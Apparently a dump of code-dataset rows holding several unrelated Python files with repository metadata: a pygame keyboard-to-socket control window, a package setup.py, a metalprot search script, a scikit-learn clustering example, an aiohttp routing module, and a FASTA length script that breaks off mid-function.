8fd862c9e970174a396c13d03631e92197b59ac2
|
[
"Apache-2.0"
] | null | null | null |
commandWindow.py
|
sturzl/keyboardControlSocket
|
8fd862c9e970174a396c13d03631e92197b59ac2
|
[
"Apache-2.0"
] | null | null | null |
commandWindow.py
|
sturzl/keyboardControlSocket
|
8fd862c9e970174a396c13d03631e92197b59ac2
|
[
"Apache-2.0"
] | null | null | null |
import customSocket
import sys, pygame
#constants
windowSize = width, height = 800, 600
#displayed in the window t ogive directiosn to the driver
instructionTextLines = open('commands.txt').readlines()
activeColor = (0,175,0)
inactiveColor = (255,0,0)
textColor = (0,0,0)
screen = pygame.display.set_mode(windowSize)
################window initialization#################################
#makes hte window, sets color, displays text etc.
def initializeWindow():
pygame.init()
setBackgorundColor(activeColor)
pygame.display.set_caption('CWRU NASA RMC 2015-2016')
displayIntructionText()
def displayIntructionText():
for lineNumber,lineText in enumerate(instructionTextLines):
displayText(lineText, lineNumber)
#creating the text object, putting it in the window, updating
#takes in a string
def displayText(text, lineNumber):
font = pygame.font.SysFont("monospace", 20)
textSurface, textContainer = getTextObject(text, font)
textContainer.center = (width/2,10+25*lineNumber)
screen.blit(textSurface, textContainer)
pygame.display.update()
#getting the font, text rectangle etc.
#takes in the string of fonts and a pygame Font
def getTextObject(text, font):
textSurface = font.render(text, True, textColor)
return textSurface, textSurface.get_rect()
def setBackgorundColor(colorTuple):
screen.fill(colorTuple)
pygame.display.update()
################################# Gettting Keyboard state ################################
#gets the currently pressed keys and sends them over the socket
def sendKeyPresses():
quit = False
keysPressed= []
while(True and (quit == False)):
nextEvent = str(pygame.event.wait())
if('KeyDown' in nextEvent):
#socket.customSend(lastEvent.split(', ')[1].split(' ')[1])
key = nextEvent.split(', ')[1].split(' ')[1]
sendCommand(translateToHex(key))
if(key == '27'):
quit = True
pygame.quit()
def translateToHex(key):
return{
'273': 76,
'274': 77,
'275': 78,
'276': 79,
'46': 57,
'47': 58,
'115': 33,
'119': 17,
'100': 34,
'97': 32,
'102': 35,
'114': 19,
'104': 37,
'32': 64,
'111': 24,
'27': 69,
}.get(key,0)
#Waits for a keyboard event, determines which keys are pressed after each keyboard event,
#returns the list of currently pressed keys
def getNextKeys():
return getCurrentKeys()
#def sendKeys(keys):
#socket.send(keys)
def getCurrentKeys():
pygameEvent = pygame.event.wait()
if pygameEvent.event.event_name() == "KEYDOWN":
return pygame.key.getPressed();
############### Main program ####################################
initializeWindow()
initializeSocket()
sendKeyPresses()
| 25.910891
| 92
| 0.670615
|
import customSocket
import sys, pygame
windowSize = width, height = 800, 600
instructionTextLines = open('commands.txt').readlines()
activeColor = (0,175,0)
inactiveColor = (255,0,0)
textColor = (0,0,0)
screen = pygame.display.set_mode(windowSize)
| true
| true
|
790dc5d903829dbda860ca4d55f8313cce6fc017
| 1,209
|
py
|
Python
|
setup.py
|
NikitaKoshelev/aio-space-track-api
|
dbf7776b6afbb9ef1917ae1526fe53bb33eb0735
|
[
"MIT"
] | 1
|
2017-05-19T16:18:55.000Z
|
2017-05-19T16:18:55.000Z
|
setup.py
|
nkoshell/aio-space-track-api
|
dbf7776b6afbb9ef1917ae1526fe53bb33eb0735
|
[
"MIT"
] | null | null | null |
setup.py
|
nkoshell/aio-space-track-api
|
dbf7776b6afbb9ef1917ae1526fe53bb33eb0735
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import codecs
import re
import sys
from distutils.core import setup
import os
if sys.version_info < (3, 5, 0):
raise RuntimeError("aio-space-track-api requires Python 3.5.0+")
PROJECT_DIR = os.path.abspath(os.path.dirname(__file__))
VERSION_REGEXP = re.compile(r"^__version__ = [\'\"](.+?)[\'\"]$", re.MULTILINE)
def read(fn):
with codecs.open(os.path.join(PROJECT_DIR, fn), encoding='utf-8') as f:
return f.read().strip()
def version():
try:
return VERSION_REGEXP.findall(read(os.path.join('aio_space_track_api', '__init__.py')))[0]
except IndexError:
raise RuntimeError('Unable to determine version.')
vn = version()
url = 'https://github.com/nkoshell/aio-space-track-api'
setup(
name='aio-space-track-api',
description='Small async wrapper for "space-track-api" package.',
long_description=read('README.rst'),
version=vn,
packages=['aio_space_track_api'],
url=url,
download_url='{url}/archive/{version}.tar.gz'.format(url=url, version=vn),
license='MIT',
author='NikitaKoshelev',
author_email='nikita.koshelev@gmail.com',
install_requires=['aiohttp>=2.0.7', 'space-track-api>=1.0.2'],
)
| 26.866667
| 98
| 0.671629
|
import codecs
import re
import sys
from distutils.core import setup
import os
if sys.version_info < (3, 5, 0):
raise RuntimeError("aio-space-track-api requires Python 3.5.0+")
PROJECT_DIR = os.path.abspath(os.path.dirname(__file__))
VERSION_REGEXP = re.compile(r"^__version__ = [\'\"](.+?)[\'\"]$", re.MULTILINE)
def read(fn):
with codecs.open(os.path.join(PROJECT_DIR, fn), encoding='utf-8') as f:
return f.read().strip()
def version():
try:
return VERSION_REGEXP.findall(read(os.path.join('aio_space_track_api', '__init__.py')))[0]
except IndexError:
raise RuntimeError('Unable to determine version.')
vn = version()
url = 'https://github.com/nkoshell/aio-space-track-api'
setup(
name='aio-space-track-api',
description='Small async wrapper for "space-track-api" package.',
long_description=read('README.rst'),
version=vn,
packages=['aio_space_track_api'],
url=url,
download_url='{url}/archive/{version}.tar.gz'.format(url=url, version=vn),
license='MIT',
author='NikitaKoshelev',
author_email='nikita.koshelev@gmail.com',
install_requires=['aiohttp>=2.0.7', 'space-track-api>=1.0.2'],
)
| true
| true
|
790dc5ee729167a086621216d1bf4f04687ccc62
| 3,575
|
py
|
Python
|
scrips/search_selfcenter/run_selfcenter_search.py
|
lonelu/Metalprot
|
e51bee472c975aa171bdb6ee426a07ca69f110ee
|
[
"MIT"
] | null | null | null |
scrips/search_selfcenter/run_selfcenter_search.py
|
lonelu/Metalprot
|
e51bee472c975aa171bdb6ee426a07ca69f110ee
|
[
"MIT"
] | null | null | null |
scrips/search_selfcenter/run_selfcenter_search.py
|
lonelu/Metalprot
|
e51bee472c975aa171bdb6ee426a07ca69f110ee
|
[
"MIT"
] | null | null | null |
#You can either add the python package path.
#sys.path.append(r'/mnt/e/GitHub_Design/Metalprot')
from metalprot.search import search_selfcenter
from metalprot.basic import filter
import pickle
import time
import prody as pr
'''
python /mnt/e/GitHub_Design/Metalprot/scrips/search_selfcenter/run_selfcenter_search.py
'''
start_time = time.time()
query_dir = '/mnt/e/DesignData/ligands/ZN_rcsb_datesplit/20211013/20211013_selfcenter/pickle_noCYS/'
with open(query_dir + 'all_metal_vdm.pkl', 'rb') as f:
query_all_metal = pickle.load(f)
with open(query_dir + 'AAMetalPhiPsi.pkl', 'rb') as f:
all_querys = pickle.load(f)
with open(query_dir + 'cluster_centroid_dict.pkl', 'rb') as f:
cluster_centroid_dict = pickle.load(f)
print(len(all_querys))
### run Search_struct
workdir = '/mnt/e/DesignData/ligands/LigandBB/MID1sc10/'
outdir = workdir + 'output_selfcenter/'
target_path = workdir + '5od1_zn.pdb'
win_filter = [35, 61, 65]
# workdir = '/mnt/e/DesignData/ligands/LigandBB/6dwv/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + '6dwv_core.pdb'
# win_filter = []
# workdir = '/mnt/e/DesignData/ligands/LigandBB/8adh/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + '1989_8adh_ZN_1.pdb'
# win_filter = []
# workdir = '/mnt/e/DesignData/ligands/LigandBB/3f7u_lig/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + '3f7u1aa.pdb'
# win_filter = [94, 96, 119]
# workdir = '/mnt/e/DesignData/ligands/LigandBB/2afw_lig/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + '2afw_aa.pdb'
# win_filter = [159, 202, 330]
# workdir = '/mnt/e/DesignData/ligands/LigandBB/huong/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + 'aQ4x_aa.pdb'
# win_filter = ['I-3', 'I-6', 'I-10', 'I-13', 'I-17', 'I-20',
# 'J-3', 'J-6', 'J-7', 'J-10', 'J-13', 'J-14', 'J-17', 'J-20', 'J-21',
# 'K-6', 'K-10', 'K-13', 'K-17', 'K-20',
# 'L-3', 'L-6', 'L-7', 'L-10', 'L-13', 'L-14', 'L-17', 'L-20', 'L-21', 'L-24',
# 'M-3', 'M-6', 'M-10', 'M-13', 'M-17', 'M-20',
# 'N-3', 'N-6', 'N-7', 'N-10', 'N-13', 'N-14', 'N-17', 'N-20', 'N-21'
# ]
geometry_path = None
#geometry_path = workdir + 'tetrahydral_geo.pdb'
metal_metal_dist = 0.3
num_contact_vdms = [3]
allowed_aa_combinations = [['H', 'H', 'H']]
allowed_aa_combinations = []
_filter = filter.Search_filter(filter_abple = False, filter_phipsi = True, max_phipsi_val = 25,
filter_vdm_score = False, min_vdm_score = 0, filter_vdm_count = False, min_vdm_clu_num = 20,
after_search_filter_geometry = True, filter_based_geometry_structure = False, angle_tol = 15, aa_aa_tol = 0.3, aa_metal_tol = 0.2,
pair_angle_range = [85, 130], pair_aa_aa_dist_range = [2.8, 4], pair_metal_aa_dist_range = None,
after_search_filter_qt_clash = True, vdm_vdm_clash_dist = 2.7, vdm_bb_clash_dist = 2.2,
after_search_open_site_clash = True, open_site_dist = 3.0,
write_filtered_result = False, selfcenter_filter_member_phipsi=True)
ss = search_selfcenter.Search_selfcenter(target_path, outdir, all_querys, cluster_centroid_dict, query_all_metal,
num_contact_vdms, metal_metal_dist, win_filter, validateOriginStruct = True, search_filter= _filter, geometry_path = None,
density_radius = 0.6, allowed_aa_combinations = allowed_aa_combinations, output_wincomb_overlap=True)
#ss.run_selfcenter_search()
search_selfcenter.run_search_selfcenter(ss)
end_time = time.time()
print(end_time - start_time, "seconds")
| 30.555556
| 134
| 0.687552
|
from metalprot.search import search_selfcenter
from metalprot.basic import filter
import pickle
import time
import prody as pr
start_time = time.time()
query_dir = '/mnt/e/DesignData/ligands/ZN_rcsb_datesplit/20211013/20211013_selfcenter/pickle_noCYS/'
with open(query_dir + 'all_metal_vdm.pkl', 'rb') as f:
query_all_metal = pickle.load(f)
with open(query_dir + 'AAMetalPhiPsi.pkl', 'rb') as f:
all_querys = pickle.load(f)
with open(query_dir + 'cluster_centroid_dict.pkl', 'rb') as f:
cluster_centroid_dict = pickle.load(f)
print(len(all_querys))
LigandBB/MID1sc10/'
outdir = workdir + 'output_selfcenter/'
target_path = workdir + '5od1_zn.pdb'
win_filter = [35, 61, 65]
geometry_path = None
metal_metal_dist = 0.3
num_contact_vdms = [3]
allowed_aa_combinations = [['H', 'H', 'H']]
allowed_aa_combinations = []
_filter = filter.Search_filter(filter_abple = False, filter_phipsi = True, max_phipsi_val = 25,
filter_vdm_score = False, min_vdm_score = 0, filter_vdm_count = False, min_vdm_clu_num = 20,
after_search_filter_geometry = True, filter_based_geometry_structure = False, angle_tol = 15, aa_aa_tol = 0.3, aa_metal_tol = 0.2,
pair_angle_range = [85, 130], pair_aa_aa_dist_range = [2.8, 4], pair_metal_aa_dist_range = None,
after_search_filter_qt_clash = True, vdm_vdm_clash_dist = 2.7, vdm_bb_clash_dist = 2.2,
after_search_open_site_clash = True, open_site_dist = 3.0,
write_filtered_result = False, selfcenter_filter_member_phipsi=True)
ss = search_selfcenter.Search_selfcenter(target_path, outdir, all_querys, cluster_centroid_dict, query_all_metal,
num_contact_vdms, metal_metal_dist, win_filter, validateOriginStruct = True, search_filter= _filter, geometry_path = None,
density_radius = 0.6, allowed_aa_combinations = allowed_aa_combinations, output_wincomb_overlap=True)
search_selfcenter.run_search_selfcenter(ss)
end_time = time.time()
print(end_time - start_time, "seconds")
| true
| true
|
790dc638b44f4387a90ba0b5662e7ebdc15d51ee
| 3,092
|
py
|
Python
|
examples/cluster/plot_digits_linkage.py
|
emarkou/scikit-learn
|
d73822f84f2832dcc25f0ff58769f60871a78025
|
[
"BSD-3-Clause"
] | 13
|
2020-01-04T07:37:38.000Z
|
2021-08-31T05:19:58.000Z
|
examples/cluster/plot_digits_linkage.py
|
emarkou/scikit-learn
|
d73822f84f2832dcc25f0ff58769f60871a78025
|
[
"BSD-3-Clause"
] | 29
|
2021-03-04T02:56:48.000Z
|
2021-04-06T04:06:45.000Z
|
examples/cluster/plot_digits_linkage.py
|
emarkou/scikit-learn
|
d73822f84f2832dcc25f0ff58769f60871a78025
|
[
"BSD-3-Clause"
] | 12
|
2021-02-05T20:33:04.000Z
|
2022-02-17T04:11:25.000Z
|
"""
=============================================================================
Various Agglomerative Clustering on a 2D embedding of digits
=============================================================================
An illustration of various linkage option for agglomerative clustering on
a 2D embedding of the digits dataset.
The goal of this example is to show intuitively how the metrics behave, and
not to find good clusters for the digits. This is why the example works on a
2D embedding.
What this example shows us is the behavior "rich getting richer" of
agglomerative clustering that tends to create uneven cluster sizes.
This behavior is pronounced for the average linkage strategy,
that ends up with a couple of singleton clusters, while in the case
of single linkage we get a single central cluster with all other clusters
being drawn from noise points around the fringes.
"""
# Authors: Gael Varoquaux
# License: BSD 3 clause (C) INRIA 2014
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
X, y = datasets.load_digits(return_X_y=True)
n_samples, n_features = X.shape
np.random.seed(0)
def nudge_images(X, y):
# Having a larger dataset shows more clearly the behavior of the
# methods, but we multiply the size of the dataset only by 2, as the
# cost of the hierarchical clustering methods are strongly
# super-linear in n_samples
shift = lambda x: ndimage.shift(x.reshape((8, 8)),
.3 * np.random.normal(size=2),
mode='constant',
).ravel()
X = np.concatenate([X, np.apply_along_axis(shift, 1, X)])
Y = np.concatenate([y, y], axis=0)
return X, Y
X, y = nudge_images(X, y)
#----------------------------------------------------------------------
# Visualize the clustering
def plot_clustering(X_red, labels, title=None):
x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
X_red = (X_red - x_min) / (x_max - x_min)
plt.figure(figsize=(6, 4))
for i in range(X_red.shape[0]):
plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
color=plt.cm.nipy_spectral(labels[i] / 10.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([])
plt.yticks([])
if title is not None:
plt.title(title, size=17)
plt.axis('off')
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
#----------------------------------------------------------------------
# 2D embedding of the digits dataset
print("Computing embedding")
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")
from sklearn.cluster import AgglomerativeClustering
for linkage in ('ward', 'average', 'complete', 'single'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
t0 = time()
clustering.fit(X_red)
print("%s :\t%.2fs" % (linkage, time() - t0))
plot_clustering(X_red, clustering.labels_, "%s linkage" % linkage)
plt.show()
| 33.608696
| 77
| 0.614166
|
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
X, y = datasets.load_digits(return_X_y=True)
n_samples, n_features = X.shape
np.random.seed(0)
def nudge_images(X, y):
shift = lambda x: ndimage.shift(x.reshape((8, 8)),
.3 * np.random.normal(size=2),
mode='constant',
).ravel()
X = np.concatenate([X, np.apply_along_axis(shift, 1, X)])
Y = np.concatenate([y, y], axis=0)
return X, Y
X, y = nudge_images(X, y)
def plot_clustering(X_red, labels, title=None):
x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
X_red = (X_red - x_min) / (x_max - x_min)
plt.figure(figsize=(6, 4))
for i in range(X_red.shape[0]):
plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
color=plt.cm.nipy_spectral(labels[i] / 10.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([])
plt.yticks([])
if title is not None:
plt.title(title, size=17)
plt.axis('off')
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
print("Computing embedding")
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")
from sklearn.cluster import AgglomerativeClustering
for linkage in ('ward', 'average', 'complete', 'single'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
t0 = time()
clustering.fit(X_red)
print("%s :\t%.2fs" % (linkage, time() - t0))
plot_clustering(X_red, clustering.labels_, "%s linkage" % linkage)
plt.show()
| true
| true
|
790dc67de74e78dc435d99eafd8bb9751781cbb1
| 6,253
|
py
|
Python
|
qiushaoyi/programs/qsy_program_codes/python3-webapp/www/coroweb.py
|
qsyPython/Python_play_now
|
278b6d5d30082f8f93b26902c854737c4919405a
|
[
"MIT"
] | 2
|
2018-03-29T08:26:17.000Z
|
2019-06-17T10:56:19.000Z
|
qiushaoyi/programs/qsy_program_codes/python3-webapp/www/coroweb.py
|
qsyPython/Python_play_now
|
278b6d5d30082f8f93b26902c854737c4919405a
|
[
"MIT"
] | 1
|
2022-03-22T20:26:08.000Z
|
2022-03-22T20:26:08.000Z
|
qiushaoyi/programs/qsy_program_codes/python3-webapp/www/coroweb.py
|
qsyPython/Python_play_now
|
278b6d5d30082f8f93b26902c854737c4919405a
|
[
"MIT"
] | 1
|
2019-02-18T10:44:20.000Z
|
2019-02-18T10:44:20.000Z
|
# ======🙋🙋🙋实现了 1个函数fn 映射 为1个URL处理函数!!!
import asyncio, os, inspect, logging, functools
from urllib import parse
from aiohttp import web
from apis import APIError
def get(path):
'''
Define decorator @get('/path')
'''
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'GET'
wrapper.__route__ = path
return wrapper
return decorator
def post(path):
'''
Define decorator @post('/path')
'''
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'POST'
wrapper.__route__ = path
return wrapper
return decorator
def get_required_kw_args(fn):
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY and param.default == inspect.Parameter.empty:
args.append(name)
return tuple(args)
def get_named_kw_args(fn):
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
args.append(name)
return tuple(args)
def has_named_kw_args(fn):
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
return True
def has_var_kw_arg(fn):
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.VAR_KEYWORD:
return True
def has_request_arg(fn):
sig = inspect.signature(fn)
params = sig.parameters
found = False
for name, param in params.items():
if name == 'request':
found = True
continue
if found and (param.kind != inspect.Parameter.VAR_POSITIONAL and param.kind != inspect.Parameter.KEYWORD_ONLY and param.kind != inspect.Parameter.VAR_KEYWORD):
raise ValueError('request parameter must be the last named parameter in function: %s%s' % (fn.__name__, str(sig)))
return found
class RequestHandler(object):
def __init__(self, app, fn):
self._app = app
self._func = fn
self._has_request_arg = has_request_arg(fn)
self._has_var_kw_arg = has_var_kw_arg(fn)
self._has_named_kw_args = has_named_kw_args(fn)
self._named_kw_args = get_named_kw_args(fn)
self._required_kw_args = get_required_kw_args(fn)
@asyncio.coroutine
def __call__(self, request):
kw = None
if self._has_var_kw_arg or self._has_named_kw_args or self._required_kw_args:
if request.method == 'POST':
if not request.content_type:
return web.HTTPBadRequest('Missing Content-Type.')
ct = request.content_type.lower()
if ct.startswith('application/json'):
params = yield from request.json()
if not isinstance(params, dict):
return web.HTTPBadRequest('JSON body must be object.')
kw = params
elif ct.startswith('application/x-www-form-urlencoded') or ct.startswith('multipart/form-data'):
params = yield from request.post()
kw = dict(**params)
else:
return web.HTTPBadRequest('Unsupported Content-Type: %s' % request.content_type)
if request.method == 'GET':
qs = request.query_string
if qs:
kw = dict()
for k, v in parse.parse_qs(qs, True).items():
kw[k] = v[0]
if kw is None:
kw = dict(**request.match_info)
else:
if not self._has_var_kw_arg and self._named_kw_args:
# remove all unamed kw:
copy = dict()
for name in self._named_kw_args:
if name in kw:
copy[name] = kw[name]
kw = copy
# check named arg:
for k, v in request.match_info.items():
if k in kw:
logging.warning('Duplicate arg name in named arg and kw args: %s' % k)
kw[k] = v
if self._has_request_arg:
kw['request'] = request
# check required kw:
if self._required_kw_args:
for name in self._required_kw_args:
if not name in kw:
return web.HTTPBadRequest('Missing argument: %s' % name)
logging.info('call with args: %s' % str(kw))
try:
r = yield from self._func(**kw)
return r
except APIError as e:
return dict(error=e.error, data=e.data, message=e.message)
def add_static(app):
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')
app.router.add_static('/static/', path)
logging.info('add static %s => %s' % ('/static/', path))
def add_route(app, fn):
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if path is None or method is None:
raise ValueError('@get or @post not defined in %s.' % str(fn))
if not asyncio.iscoroutinefunction(fn) and not inspect.isgeneratorfunction(fn):
fn = asyncio.coroutine(fn)
logging.info('add route %s %s => %s(%s)' % (method, path, fn.__name__, ', '.join(inspect.signature(fn).parameters.keys())))
app.router.add_route(method, path, RequestHandler(app, fn))
def add_routes(app, module_name):
n = module_name.rfind('.')
if n == (-1):
mod = __import__(module_name, globals(), locals())
else:
name = module_name[n+1:]
mod = getattr(__import__(module_name[:n], globals(), locals(), [name]), name)
for attr in dir(mod):
if attr.startswith('_'):
continue
fn = getattr(mod, attr)
if callable(fn):
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if method and path:
add_route(app, fn)
| 36.567251
| 167
| 0.581481
|
import asyncio, os, inspect, logging, functools
from urllib import parse
from aiohttp import web
from apis import APIError
def get(path):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'GET'
wrapper.__route__ = path
return wrapper
return decorator
def post(path):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'POST'
wrapper.__route__ = path
return wrapper
return decorator
def get_required_kw_args(fn):
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY and param.default == inspect.Parameter.empty:
args.append(name)
return tuple(args)
def get_named_kw_args(fn):
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
args.append(name)
return tuple(args)
def has_named_kw_args(fn):
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
return True
def has_var_kw_arg(fn):
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.VAR_KEYWORD:
return True
def has_request_arg(fn):
sig = inspect.signature(fn)
params = sig.parameters
found = False
for name, param in params.items():
if name == 'request':
found = True
continue
if found and (param.kind != inspect.Parameter.VAR_POSITIONAL and param.kind != inspect.Parameter.KEYWORD_ONLY and param.kind != inspect.Parameter.VAR_KEYWORD):
raise ValueError('request parameter must be the last named parameter in function: %s%s' % (fn.__name__, str(sig)))
return found
class RequestHandler(object):
def __init__(self, app, fn):
self._app = app
self._func = fn
self._has_request_arg = has_request_arg(fn)
self._has_var_kw_arg = has_var_kw_arg(fn)
self._has_named_kw_args = has_named_kw_args(fn)
self._named_kw_args = get_named_kw_args(fn)
self._required_kw_args = get_required_kw_args(fn)
@asyncio.coroutine
def __call__(self, request):
kw = None
if self._has_var_kw_arg or self._has_named_kw_args or self._required_kw_args:
if request.method == 'POST':
if not request.content_type:
return web.HTTPBadRequest('Missing Content-Type.')
ct = request.content_type.lower()
if ct.startswith('application/json'):
params = yield from request.json()
if not isinstance(params, dict):
return web.HTTPBadRequest('JSON body must be object.')
kw = params
elif ct.startswith('application/x-www-form-urlencoded') or ct.startswith('multipart/form-data'):
params = yield from request.post()
kw = dict(**params)
else:
return web.HTTPBadRequest('Unsupported Content-Type: %s' % request.content_type)
if request.method == 'GET':
qs = request.query_string
if qs:
kw = dict()
for k, v in parse.parse_qs(qs, True).items():
kw[k] = v[0]
if kw is None:
kw = dict(**request.match_info)
else:
if not self._has_var_kw_arg and self._named_kw_args:
copy = dict()
for name in self._named_kw_args:
if name in kw:
copy[name] = kw[name]
kw = copy
for k, v in request.match_info.items():
if k in kw:
logging.warning('Duplicate arg name in named arg and kw args: %s' % k)
kw[k] = v
if self._has_request_arg:
kw['request'] = request
if self._required_kw_args:
for name in self._required_kw_args:
if not name in kw:
return web.HTTPBadRequest('Missing argument: %s' % name)
logging.info('call with args: %s' % str(kw))
try:
r = yield from self._func(**kw)
return r
except APIError as e:
return dict(error=e.error, data=e.data, message=e.message)
def add_static(app):
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')
app.router.add_static('/static/', path)
logging.info('add static %s => %s' % ('/static/', path))
def add_route(app, fn):
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if path is None or method is None:
raise ValueError('@get or @post not defined in %s.' % str(fn))
if not asyncio.iscoroutinefunction(fn) and not inspect.isgeneratorfunction(fn):
fn = asyncio.coroutine(fn)
logging.info('add route %s %s => %s(%s)' % (method, path, fn.__name__, ', '.join(inspect.signature(fn).parameters.keys())))
app.router.add_route(method, path, RequestHandler(app, fn))
def add_routes(app, module_name):
n = module_name.rfind('.')
if n == (-1):
mod = __import__(module_name, globals(), locals())
else:
name = module_name[n+1:]
mod = getattr(__import__(module_name[:n], globals(), locals(), [name]), name)
for attr in dir(mod):
if attr.startswith('_'):
continue
fn = getattr(mod, attr)
if callable(fn):
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if method and path:
add_route(app, fn)
| true
| true
|
790dc7a15f3e10652fa91d703d5d33b46dee027c
| 3,734
|
py
|
Python
|
python/fasta/seqlength.py
|
lotharwissler/bioinformatics
|
83a53771222ecb0759e3b4bfa2018d2cd7647643
|
[
"MIT"
] | 10
|
2016-01-13T00:39:30.000Z
|
2020-11-30T05:56:19.000Z
|
python/fasta/seqlength.py
|
lotharwissler/bioinformatics
|
83a53771222ecb0759e3b4bfa2018d2cd7647643
|
[
"MIT"
] | 1
|
2017-02-09T22:46:49.000Z
|
2017-02-09T22:46:49.000Z
|
python/fasta/seqlength.py
|
lotharwissler/bioinformatics
|
83a53771222ecb0759e3b4bfa2018d2cd7647643
|
[
"MIT"
] | 10
|
2015-10-09T00:29:16.000Z
|
2019-06-09T05:32:15.000Z
|
#!/usr/bin/python
import os, sys # low level handling, such as command line stuff
import string # string methods available
import re # regular expressions
import getopt # comand line argument handling
import math # match functions
from low import * # custom functions, written by myself
# =============================================================================
def show_help( ):
""" displays the program parameter list and usage information """
stdout( "usage: " + sys.argv[0] + " -f <path>" )
stdout( " " )
stdout( " option description" )
stdout( " -h help (this text here)" )
stdout( " -f fasta file to import" )
stdout( " -g map file, tab delimited, regex to name (one per line) to group sequences into distinct bins" )
stdout( " " )
sys.exit(1)
# =============================================================================
def handle_arguments():
""" verifies the presence of all necessary arguments and returns the data dir """
if len ( sys.argv ) == 1:
stderr( "no arguments provided." )
show_help()
try: # check for the right arguments
keys, values = getopt.getopt( sys.argv[1:], "hf:g:" )
except getopt.GetoptError:
stderr( "invalid arguments provided." )
show_help()
args = {}
for key, value in keys:
if key == '-f': args['file'] = value
if key == '-g': args['group'] = value
if not args.has_key('file'):
stderr( "import file argument missing." )
show_help()
elif not file_exists( args.get('file') ):
stderr( "import file does not exist." )
show_help()
return args
# =============================================================================
def read_groups( file ):
groups = {}
fo = open( file )
for line in fo:
line = line.rstrip()
regex, name = line.split("\t")
groups[name] = re.compile(regex)
fo.close()
return groups
# =============================================================================
def read_sequences( file, groups ):
def add_entry( hash, groups, id, seq ):
group = "*all*"
for name, regex in groups.iteritems():
if re.search(regex, id):
group = name
break
if hash[group].has_key(id): sys.stderr.write("WARNING: overwriting entry with the same ID (%s) in group %s...\n" %(id, group))
hash[group][id] = seq
return hash
hash = {}
for name, regex in groups.iteritems(): hash[name] = {}
if hash.has_key('*all*'): sys.stderr.write("WARNING: you used \"*all*\" as a group name. This name refers to all non-group-matching entries as well!\n")
hash['*all*'] = {}
id, seq = "", ""
fo = open( file )
for line in fo:
line = line.rstrip()
if line.startswith(">"):
if id != "": add_entry( hash, groups, id, seq )
id = line[1:]
seq = ""
else:
seq += line
if id != "": add_entry( hash, groups, id, seq )
fo.close()
return hash
# =============================================================================
def eval_seq_lengths(hash):
for group, seqhash in hash.iteritems():
for id, seq in seqhash.iteritems():
print string.join([group, id, str(len(seq))], "\t")
# =============================================================================
# === MAIN ====================================================================
# =============================================================================
def main( args ):
groups = {}
if args.has_key('group'): groups = read_groups( args.get('group') )
seqhash = read_sequences( args.get('file'), groups )
eval_seq_lengths(seqhash)
# =============================================================================
args = handle_arguments()
main( args )
| 33.044248
| 154
| 0.497054
|
import os, sys
import string
import re
import getopt
import math
from low import *
def show_help( ):
""" displays the program parameter list and usage information """
stdout( "usage: " + sys.argv[0] + " -f <path>" )
stdout( " " )
stdout( " option description" )
stdout( " -h help (this text here)" )
stdout( " -f fasta file to import" )
stdout( " -g map file, tab delimited, regex to name (one per line) to group sequences into distinct bins" )
stdout( " " )
sys.exit(1)
def handle_arguments():
""" verifies the presence of all necessary arguments and returns the data dir """
if len ( sys.argv ) == 1:
stderr( "no arguments provided." )
show_help()
try:
keys, values = getopt.getopt( sys.argv[1:], "hf:g:" )
except getopt.GetoptError:
stderr( "invalid arguments provided." )
show_help()
args = {}
for key, value in keys:
if key == '-f': args['file'] = value
if key == '-g': args['group'] = value
if not args.has_key('file'):
stderr( "import file argument missing." )
show_help()
elif not file_exists( args.get('file') ):
stderr( "import file does not exist." )
show_help()
return args
def read_groups( file ):
groups = {}
fo = open( file )
for line in fo:
line = line.rstrip()
regex, name = line.split("\t")
groups[name] = re.compile(regex)
fo.close()
return groups
def read_sequences( file, groups ):
def add_entry( hash, groups, id, seq ):
group = "*all*"
for name, regex in groups.iteritems():
if re.search(regex, id):
group = name
break
